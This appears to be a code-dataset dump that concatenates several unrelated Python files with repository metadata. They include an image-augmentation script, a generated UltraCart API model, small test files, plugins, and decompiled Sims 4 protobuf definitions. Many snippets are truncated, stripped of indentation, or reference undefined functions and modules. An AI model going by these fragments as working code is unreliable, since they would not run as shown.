"BSD-3-Clause"
] | null | null | null | from mxnet import nd
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..')))
import utils.common as dataset_commons
import cv2
import numpy as np
import glob
import pandas as pd
from gluoncv.data.transforms.presets.ssd import SSDDefaultTrainTransform
from matplotlib import pyplot as plt
'''
This code only gives you a tool to visualize
the images pointed in the csv file and the related bounding boxes using openCV
'''
data_common = dataset_commons.get_dataset_files()
# classes_keys = [key for key in data_common['classes']]
if __name__ == "__main__":
source_images_path = data_common['image_folder']
source_csv_path = data_common['csv_path']
# TODO: Set the file save path
images_path_save = 'images_augmented/' # Folder that will contain the resized images
csv_path_save = 'images_augmented/csv/val_dataset.csv'
img_height = 300
img_width = 300
csv_converter = load_images_from_csv_and_augment(source_images_path, source_csv_path, images_path_save, img_width, img_height)
if not os.path.exists(images_path_save):
try:
os.makedirs(images_path_save + 'csv')
except OSError as e:
if e.errno != errno.EEXIST:
raise
csv_converter.to_csv(csv_path_save, index=None)
print('Successfully converted to a new csv file.')
| 33.826087 | 130 | 0.633248 |
5f9a91b6b4cb83726c16979ae7cd27a95c8fd08d | 12,235 | py | Python | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | 1 | 2018-03-15T16:56:23.000Z | 2018-03-15T16:56:23.000Z | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplyLibraryItemResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.211735 | 213 | 0.621087 |
5f9b09cbcd120955bb173c4d9f5b1fd61f32f6e1 | 103 | py | Python | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 65 | 2017-03-21T09:15:40.000Z | 2022-02-01T23:43:08.000Z | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 100 | 2016-12-15T03:44:06.000Z | 2022-03-07T08:14:07.000Z | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 52 | 2016-12-19T07:48:52.000Z | 2022-02-19T17:53:48.000Z | np_pressures_hPa * math.exp(-gravit_acc * molar_mass_earth* height/(gas_constant*standard_temperature)) | 103 | 103 | 0.84466 |
5f9b8fe1beadc23d6a4c015ccb7948ee8af7a618 | 322 | py | Python | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | from pytest import mark
# if setup.py present, code could be installed as library
# so that there's no need include path
# pip install -e .
from pytest_resources import do_lower_case
# from src.for_testing import do_lower_case
| 24.769231 | 57 | 0.773292 |
5f9c3b49af1837552a765743d83f19677ef7b0fe | 3,476 | py | Python | targets/simple_router/flow_radar_bm/change_bm.py | tsihang-zz/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 15 | 2018-08-21T10:49:38.000Z | 2021-06-23T14:33:32.000Z | targets/simple_router/flow_radar_bm/change_bm.py | harvard-cns/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 1 | 2017-10-16T07:49:06.000Z | 2017-10-16T13:45:36.000Z | targets/simple_router/flow_radar_bm/change_bm.py | USC-NSL/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 6 | 2016-07-26T15:47:46.000Z | 2018-03-23T01:50:06.000Z | import re
import os
# copy required files
# change actions.c to add flow_radar lock
# change p4_pd_rpc_server.ipp
if __name__ == "__main__":
copy_files()
change_actions_c()
change_p4_pd_rpc_server_ipp()
change_p4_pd_rpc_thrift()
| 31.035714 | 148 | 0.649597 |
5f9c54619428b0b6d3296e3c0080e9ec17335d9c | 2,807 | py | Python | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# calculation tool for a bridge circuit with two input current sources
# two current sources can supply from both of top of the bridge and middle of the bridge
# define the voltage name as follows:
# Vp: voltage at the top of the bridge
# Vn: voltage at the middle of the bridge
if __name__ == '__main__':
main()
| 25.990741 | 88 | 0.540791 |
5f9c577bd20e78c6c12bbdda22baa4f5a81a595e | 618 | py | Python | Python/Armstrong_Number.py | shashwat-agarwal/hacktoberfest-2 | 552a4278ffd671603f8659562427b0f1ac5127a4 | [
"Apache-2.0"
] | 17 | 2020-10-02T03:28:33.000Z | 2020-10-24T04:08:30.000Z | Python/Armstrong_Number.py | shubhamgoel90/hacktoberfest | e7b1aa18485c4a080b2568910f82e98a5feb6f37 | [
"Apache-2.0"
] | 22 | 2020-10-01T20:00:56.000Z | 2020-10-31T01:56:10.000Z | Python/Armstrong_Number.py | shubhamgoel90/hacktoberfest | e7b1aa18485c4a080b2568910f82e98a5feb6f37 | [
"Apache-2.0"
] | 139 | 2020-10-01T19:51:40.000Z | 2020-11-02T19:58:19.000Z | #Program to check whether the number is an armstrong number or not
#Ask user to enter the number
number=int(input("Enter the number you want to check armstrong: "))
#To calculate the length of number entered.
order=len(str(number))
#Initialise sum to 0
sum=0
temp=number
while temp>0:
num=temp%10
sum+=num**order
temp//=10
if (number==sum):
print("The number you have entered is an Armstrong number.")
else:
print("The number you have entered is not an Armstrong number.")
#OUTPUT:
#Enter the number you want to check armstrong: 1634
#The number you have entered is an Armstrong number.
| 21.310345 | 68 | 0.723301 |
5f9c87648a4e17596d684c15485c9c92d81abb57 | 304 | py | Python | pyexlatex/models/format/hline.py | whoopnip/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | 4 | 2020-06-08T07:17:12.000Z | 2021-11-04T21:39:52.000Z | pyexlatex/models/format/hline.py | nickderobertis/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | 24 | 2020-02-17T17:20:44.000Z | 2021-12-20T00:10:19.000Z | pyexlatex/models/format/hline.py | nickderobertis/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | null | null | null | from pyexlatex.models.sizes.textwidth import TextWidth
from pyexlatex.models.format.rule import Rule
| 25.333333 | 65 | 0.710526 |
5f9d943e1c5e5e036c07d0eb1ed8c96b9fd06019 | 4,038 | py | Python | sixx/plugins/images.py | TildeBeta/6X | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 2 | 2018-03-06T20:39:49.000Z | 2018-03-17T04:28:57.000Z | sixx/plugins/images.py | TildeBeta/TwitterImages | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 2 | 2018-03-06T20:39:46.000Z | 2018-03-15T17:03:03.000Z | sixx/plugins/images.py | TildeBeta/TwitterImages | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 1 | 2018-04-25T22:24:40.000Z | 2018-04-25T22:24:40.000Z | from math import sqrt
import asks
import datetime
import numpy as np
import random
from PIL import Image
from PIL.ImageDraw import Draw
from PIL.ImageEnhance import Brightness
from PIL.ImageFont import truetype
from curio import spawn_thread
from curious.commands import Context, Plugin, command
from io import BytesIO
from sixx.plugins.utils.pillow import add_noise, add_scanlines, antialiased_text, save_image
SCANLINES, NOISE, BOTH = range(3)
| 40.38 | 124 | 0.488856 |
5f9df6e37fc71858adef3ee969afe3699916d4a6 | 2,669 | py | Python | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | import logging
from maskgen import video_tools
import random
import maskgen.video_tools
import os
import maskgen
import json
plugin = "DonorPicker" | 38.128571 | 124 | 0.557887 |
5f9e0f831db1b36f8edc783c6c1bfaa61c116474 | 1,228 | py | Python | track_model/eval_avg_scores.py | QUVA-Lab/lang-tracker | 6cb3630471765565b6f2d34a160f0cd51d95a082 | [
"BSD-2-Clause-FreeBSD"
] | 31 | 2017-09-13T13:40:59.000Z | 2022-01-25T16:55:19.000Z | track_model/eval_avg_scores.py | zhenyangli/lang-tracker | dddd808a22582573ab0a5e4c3dbf0ba054e42d61 | [
"BSD-3-Clause"
] | 4 | 2017-09-14T01:56:58.000Z | 2021-01-28T00:58:58.000Z | track_model/eval_avg_scores.py | QUVA-Lab/lang-tracker | 6cb3630471765565b6f2d34a160f0cd51d95a082 | [
"BSD-2-Clause-FreeBSD"
] | 9 | 2017-09-28T03:22:08.000Z | 2021-01-19T10:56:44.000Z | import caffe
import numpy as np
import os
import sys
import track_model_train as track_model
import train_config
max_iter = 1000
if __name__ == '__main__':
config = train_config.Config()
eval_avg_scores(config)
| 29.95122 | 90 | 0.643322 |
5f9e1b47610239b65145f24fa61ab7d89533b94e | 1,968 | py | Python | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 1 | 2018-05-31T17:29:30.000Z | 2018-05-31T17:29:30.000Z | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 8 | 2015-02-20T16:22:12.000Z | 2019-04-25T23:57:43.000Z | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 8 | 2015-02-28T06:56:15.000Z | 2020-01-02T22:42:09.000Z | #
# Copyright (C) 2014 Conjur Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from mock import patch
import conjur
api = conjur.new_from_key('foo', 'bar')
group = api.group('v1/admins')
| 37.132075 | 82 | 0.757622 |
5f9e9628295536489ee271571858b5c113c24c7c | 99,362 | py | Python | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: D:\dev\TS4\_deploy\Client\Releasex64\Python\Generated\protocolbuffers\Social_pb2.py
# Compiled at: 2020-12-13 14:24:09
# Size of source mod 2**32: 103336 bytes
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
import protocolbuffers.Consts_pb2 as Consts_pb2
import protocolbuffers.Chat_pb2 as Chat_pb2
import protocolbuffers.S4Common_pb2 as S4Common_pb2
import protocolbuffers.Localization_pb2 as Localization_pb2
import protocolbuffers.Exchange_pb2 as Exchange_pb2
DESCRIPTOR = descriptor.FileDescriptor(name='Social.proto',
package='EA.Sims4.Network',
serialized_pb='\n\x0cSocial.proto\x12\x10EA.Sims4.Network\x1a\x0cConsts.proto\x1a\nChat.proto\x1a\x0eS4Common.proto\x1a\x12Localization.proto\x1a\x0eExchange.proto"v\n\x0fSocialFriendMsg\x12\r\n\x05simId\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x0c\n\x04note\x18\x03 \x01(\t\x12\x0e\n\x06prefix\x18\x04 \x01(\t\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x12\n\ncheatForce\x18\x06 \x01(\x08",\n\x18SocialPersonaResponseMsg\x12\x10\n\x08personas\x18\x01 \x03(\t"\x7f\n\x15SocialGenericResponse\x12\r\n\x05error\x18\x01 \x01(\r\x121\n\x08msg_type\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x0e\n\x06postId\x18\x03 \x01(\x0c\x12\x14\n\x0cpostParentId\x18\x04 \x01(\x0c"\x02\n\x14SocialPlayerInfoList\x12B\n\x07players\x18\x01 \x03(\x0b21.EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo\x1a\x01\n\nPlayerInfo\x12\x13\n\x0bAccountName\x18\x01 \x01(\t\x12\x14\n\x0cAccountNotes\x18\x02 \x01(\t\x128\n\x08presence\x18\x03 \x01(\x0e2&.EA.Sims4.Network.OnlinePresenceStatus\x12\x15\n\rOnlineStatus2\x18\x04 \x01(\t\x12\x11\n\tNucleusId\x18\t \x01(\x04\x12\x11\n\tPlayerBio\x18\n \x01(\t\x12\x18\n\x10exclude_reported\x18\x0b \x01(\x08\x12\x15\n\rIsUserBlocked\x18\x0c \x01(\x08"a\n\x0fSocialSearchMsg\x12\x0e\n\x06prefix\x18\x01 \x01(\t\x12>\n\x0esearch_results\x18\x02 \x03(\x0b2&.EA.Sims4.Network.LocalizedStringToken"=\n\x12OriginErrorMessage\x12\x11\n\terrorcode\x18\x01 \x01(\r\x12\x14\n\x0cerrormessage\x18\x02 \x01(\t"\x97\x01\n\x1bSocialInviteResponseMessage\x12\x14\n\x0cinvitationid\x18\x01 \x01(\t\x12\x16\n\x0einvitationtype\x18\x02 \x01(\r\x12\x18\n\x10inviternucleusid\x18\x03 \x01(\x04\x12\x19\n\x11accepternucleusid\x18\x04 \x01(\x04\x12\x15\n\ractionSuccess\x18\x05 \x01(\x08"J\n\x13SocialCassandraTest\x123\n\x06opcode\x18\x01 \x01(\x0e2#.EA.Sims4.Network.CassandraTestCode"\x88\x01\n\x1eSocialFriendListRequestMessage\x12\x12\n\naccount_id\x18\x01 \x01(\x04\x12\x11\n\tfriend_id\x18\x02 \x01(\x04\x12\x13\n\x0baddress_str\x18\x03 \x01(\t\x12\x12\n\nobject_str\x18\x04 \x01(\t\x12\x16\n\x0ereply_proxy_id\x18\x05 \x01(\x04"_\n!SocialRequestNucleusIdFromPersona\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x13\n\x0bpersonaName\x18\x02 \x01(\t\x12\x12\n\nmessage_id\x18\x03 \x01(\r"^\n"SocialNucleusIdFromPersonaResponse\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x12\n\nmessage_id\x18\x03 \x01(\r"S\n\x15SocialExchangeMessage\x12:\n\x08envelope\x18\x01 \x01(\x0b2(.EA.Sims4.Network.ExchangeSocialEnvelope"+\n\x16SocialFollowersMessage\x12\x11\n\tsfim_blob\x18\x01 \x03(\x0c"\x02\n\x15SocialFeedItemMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x127\n\tfeed_type\x18\x02 \x01(\x0e2$.EA.Sims4.Network.SocialFeedItemType\x120\n\x08metadata\x18\x03 \x01(\x0b2\x1e.EA.Sims4.Network.TrayMetadata\x12\x11\n\tnucleusid\x18\x04 \x01(\x04\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x10\n\x08quantity\x18\x06 \x01(\x04\x12\x1a\n\x12follower_nucleusid\x18\x07 \x01(\x04\x12\x18\n\x10follower_persona\x18\x08 \x01(\t\x12@\n\x0efollowers_blob\x18\t \x01(\x0b2(.EA.Sims4.Network.SocialFollowersMessage\x12\x18\n\x10is_maxis_curated\x18\n \x01(\x08"Z\n!SocialFeedItemUnserializedMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x12\x0c\n\x04data\x18\x02 \x01(\x0c\x12\x16\n\x0ecount_override\x18\x03 \x01(\x04"d\n\x18SocialWallCommentMessage\x12\x0c\n\x04uuid\x18\x01 \x01(\x0c\x12\x11\n\tauthor_id\x18\x02 \x01(\x04\x12\x16\n\x0eauthor_persona\x18\x03 \x01(\t\x12\x0f\n\x07message\x18\x04 \x01(\t"\x01\n\x1cSocialGetWallCommentsMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x15\n\rstarting_uuid\x18\x03 \x01(\x0c\x12\x13\n\x0bnum_results\x18\x04 \x01(\r\x12<\n\x08messages\x18\x05 \x03(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage\x12\x0e\n\x06hidden\x18\x06 \x01(\x08\x12\x18\n\x10exclude_reported\x18\x07 \x01(\x08"\x82\x01\n\x1cSocialPostWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12;\n\x07message\x18\x03 \x01(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage"U\n\x1eSocialDeleteWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x0c\n\x04uuid\x18\x03 \x01(\x0c"\x01\n\x1cSocialRequestFeedWallMessage\x12\x13\n\x0bending_uuid\x18\x01 \x01(\x0c\x129\n\x08messages\x18\x02 \x03(\x0b2\'.EA.Sims4.Network.SocialFeedItemMessage\x12R\n\x15unserialized_messages\x18\x03 \x03(\x0b23.EA.Sims4.Network.SocialFeedItemUnserializedMessage\x12\x11\n\tnum_items\x18\x04 \x01(\r"m\n\x1dSocialRequestFollowersMessage\x12\x10\n\x08playerid\x18\x01 \x01(\x04\x12\n\n\x02id\x18\x02 \x01(\t\x12\x19\n\x11prev_last_persona\x18\x03 \x01(\t\x12\x13\n\x0bnum_request\x18\x04 \x01(\r";\n\x1eSocialRequestIgnoreListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04"\x01\n\x1eSocialGetPlayerInfoListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04\x12U\n\x10player_info_list\x18\x02 \x03(\x0b2;.EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo\x1aU\n\nPlayerInfo\x12\x12\n\nnucleus_id\x18\x01 \x01(\x04\x12\x16\n\x0eorigin_persona\x18\x02 \x01(\t\x12\x1b\n\x13first_party_persona\x18\x03 \x01(\t"X\n\x1cSocialCommentPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x11\n\tcommentid\x18\x02 \x01(\x0c\x12\x12\n\ncommentKey\x18\x03 \x01(\t"D\n\x18SocialBioPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x15\n\rbio_nucleusid\x18\x02 \x01(\x04"+\n\x18SocialFeedRemovalMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c"\x8f\x12\n\x14SocialControlMessage\x12/\n\x06opcode\x18\x01 \x02(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12.\n\x05subop\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x15\n\rtransactionId\x18\x03 \x01(\x04\x12\x0e\n\x06result\x18d \x01(\r\x12J\n\x12getwallcommentsmsg\x18\x04 \x01(\x0b2..EA.Sims4.Network.SocialGetWallCommentsMessage\x12J\n\x12postwallcommentmsg\x18\x05 \x01(\x0b2..EA.Sims4.Network.SocialPostWallCommentMessage\x12N\n\x14deletewallcommentmsg\x18\x06 \x01(\x0b20.EA.Sims4.Network.SocialDeleteWallCommentMessage\x124\n\tfriendmsg\x18\x07 \x01(\x0b2!.EA.Sims4.Network.SocialFriendMsg\x12@\n\x0fgenericresponse\x18\x08 \x01(\x0b2\'.EA.Sims4.Network.SocialGenericResponse\x12:\n\nplayerinfo\x18\t \x01(\x0b2&.EA.Sims4.Network.SocialPlayerInfoList\x12:\n\nfeedsubmsg\x18\n \x01(\x0b2&.EA.Sims4.Network.SocialFeedSubMessage\x12:\n\x0fsearchresultmsg\x18\x0b \x01(\x0b2!.EA.Sims4.Network.SocialSearchMsg\x12H\n\x11inviteresponsemsg\x18\x0c \x01(\x0b2-.EA.Sims4.Network.SocialInviteResponseMessage\x129\n\x0boriginerror\x18\r \x01(\x0b2$.EA.Sims4.Network.OriginErrorMessage\x12B\n\x13socialcassandratest\x18\x0e \x01(\x0b2%.EA.Sims4.Network.SocialCassandraTest\x12T\n\x1asocialfriendlistrequestmsg\x18\x0f \x01(\x0b20.EA.Sims4.Network.SocialFriendListRequestMessage\x12^\n!socialrequestnucleusidfrompersona\x18\x10 \x01(\x0b23.EA.Sims4.Network.SocialRequestNucleusIdFromPersona\x12`\n"socialnucleusidfrompersonaresponse\x18\x11 \x01(\x0b24.EA.Sims4.Network.SocialNucleusIdFromPersonaResponse\x12F\n\x15socialexchangemessage\x18\x12 \x01(\x0b2\'.EA.Sims4.Network.SocialExchangeMessage\x12T\n\x1csocialrequestfeedwallmessage\x18\x13 \x01(\x0b2..EA.Sims4.Network.SocialRequestFeedWallMessage\x12A\n\x0cstat_tickers\x18\x15 \x01(\x0b2+.EA.Sims4.Network.ExchangeStatTickerMessage\x12L\n\x14comment_petition_msg\x18\x16 \x01(\x0b2..EA.Sims4.Network.SocialCommentPetitionMessage\x12B\n\x0efeedremovalmsg\x18\x17 \x01(\x0b2*.EA.Sims4.Network.SocialFeedRemovalMessage\x12D\n\x10bio_petition_msg\x18\x18 \x01(\x0b2*.EA.Sims4.Network.SocialBioPetitionMessage\x12B\n\x0cfb_event_msg\x18\x19 \x01(\x0b2,.EA.Sims4.Network.SocialFacebookEventMessage\x12M\n\x14requestfollowers_msg\x18\x1a \x01(\x0b2/.EA.Sims4.Network.SocialRequestFollowersMessage\x12O\n\x15responsefollowers_msg\x18\x1b \x01(\x0b20.EA.Sims4.Network.SocialResponseFollowersMessage\x12O\n\x15requestignorelist_msg\x18\x1c \x01(\x0b20.EA.Sims4.Network.SocialRequestIgnoreListMessage\x12W\n\x1dresponse_player_info_list_msg\x18\x1d \x01(\x0b20.EA.Sims4.Network.SocialGetPlayerInfoListMessage\x12_\n\x1eplayer_identification_list_msg\x18\x1e \x01(\x0b27.EA.Sims4.Network.ServerPlayerIdentificationListMessage\x12@\n\rcandidate_msg\x18\x1f \x01(\x0b2).EA.Sims4.Network.SocialCandidatesMessage\x12P\n\x16evaluation_results_msg\x18 \x01(\x0b20.EA.Sims4.Network.SocialEvaluationResultsMessage\x12>\n\rcg_update_msg\x18! \x01(\x0b2\'.EA.Sims4.Network.SocialCGUpdateMessage"7\n\x13SocialInvalidateMsg\x12\x13\n\x0bcache_index\x18\x01 \x01(\r\x12\x0b\n\x03key\x18\x02 \x01(\x0c"t\n"SocialControlQueueBroadcastMessage\x127\n\x07control\x18\x01 \x01(\x0b2&.EA.Sims4.Network.SocialControlMessage\x12\x15\n\tfriendIds\x18\x03 \x03(\x04B\x02\x10\x01"5\n\x10LifeEventMessage\x12\x0c\n\x04type\x18\x01 \x01(\r\x12\x13\n\x07sim_ids\x18\x02 \x03(\x06B\x02\x10\x01"Q\n\x1aSocialFacebookEventMessage\x12\x10\n\x08objectId\x18\x01 \x02(\t\x12\x13\n\x0baccessToken\x18\x02 \x02(\t\x12\x0c\n\x04guid\x18\x03 \x02(\t"\x01\n"SocialCandidateStatisticSubmessage\x12\x11\n\tremote_id\x18\x01 \x01(\x0c\x12\x13\n\x0bviews_count\x18\x02 \x01(\r\x12\x12\n\nwins_count\x18\x03 \x01(\r\x12\x10\n\x08platform\x18\x04 \x01(\r\x12\x10\n\x08category\x18\x05 \x01(\r\x12\x18\n\x0cwas_reported\x18\x06 \x01(\x08B\x02\x18\x01\x12\x19\n\x11expires_epoch_sec\x18\x07 \x01(\x04"\x01\n\x17SocialCandidatesMessage\x12\r\n\x05count\x18\x01 \x01(\r\x12\x1c\n\x14platform_restriction\x18\x02 \x01(\r\x12\x1c\n\x14category_restriction\x18\x03 \x01(\r\x12\x11\n\tchallenge\x18\x04 \x01(\t\x12\x0e\n\x06digest\x18\x05 \x01(\x0c\x12H\n\ncandidates\x18\x06 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage\x12\x19\n\x11expire_epoch_secs\x18\x07 \x01(\x04"W\n\x1eSocialEvaluationResultsMessage\x12\x12\n\nwinner_ids\x18\x01 \x03(\t\x12\x11\n\tloser_ids\x18\x02 \x03(\t\x12\x0e\n\x06digest\x18\x03 \x01(\x0c"t\n\x15SocialCGDigestMessage\x12\x11\n\tchallenge\x18\x01 \x01(\t\x12H\n\ncandidates\x18\x02 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage*\x01\n\x12SocialFeedItemType\x12\x17\n\x13SFI_ITEM_DOWNLOADED\x10\x00\x12\x15\n\x11SFI_ITEM_UPLOADED\x10\x01\x12\x16\n\x12SFI_ITEM_FAVORITED\x10\x02\x12\x16\n\x12SFI_ITEM_COMMENTED\x10\x03\x12\x16\n\x12SFI_ITEM_SHOWCASED\x10\x04\x12\x19\n\x15SFI_PROFILE_COMMENTED\x10\x05\x12\x15\n\x11SFI_NEW_FOLLOWERS\x10\x06*\x86\x02\n\x18SocialClusterMessageType\x12\r\n\tSOC_LOGIN\x10\x00\x12\x0e\n\nSOC_LOGOFF\x10\x01\x12\x16\n\x12SOC_PRESENCEUPDATE\x10\x02\x12\x12\n\x0eSOC_FEEDUPDATE\x10\x03\x12\x13\n\x0fSOC_ADD_FEEDSUB\x10\x04\x12\x16\n\x12SOC_REMOVE_FEEDSUB\x10\x05\x12\x18\n\x14SOC_BROADCAST_PRIVOP\x10\x06\x12\x18\n\x14SOC_BROADCAST_QUEUED\x10\x08\x12"\n\x1eSOC_BROADCAST_CACHE_INVALIDATE\x10\t\x12\x1a\n\x16SOC_REST_USER_REGISTER\x10\n')
_SOCIALFEEDITEMTYPE = descriptor.EnumDescriptor(name='SocialFeedItemType',
full_name='EA.Sims4.Network.SocialFeedItemType',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(name='SFI_ITEM_DOWNLOADED',
index=0,
number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_UPLOADED',
index=1,
number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_FAVORITED',
index=2,
number=2,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_COMMENTED',
index=3,
number=3,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_SHOWCASED',
index=4,
number=4,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_PROFILE_COMMENTED',
index=5,
number=5,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_NEW_FOLLOWERS',
index=6,
number=6,
options=None,
type=None)],
containing_type=None,
options=None,
serialized_start=6663,
serialized_end=6853)
_SOCIALCLUSTERMESSAGETYPE = descriptor.EnumDescriptor(name='SocialClusterMessageType',
full_name='EA.Sims4.Network.SocialClusterMessageType',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(name='SOC_LOGIN',
index=0,
number=0,
options=None,
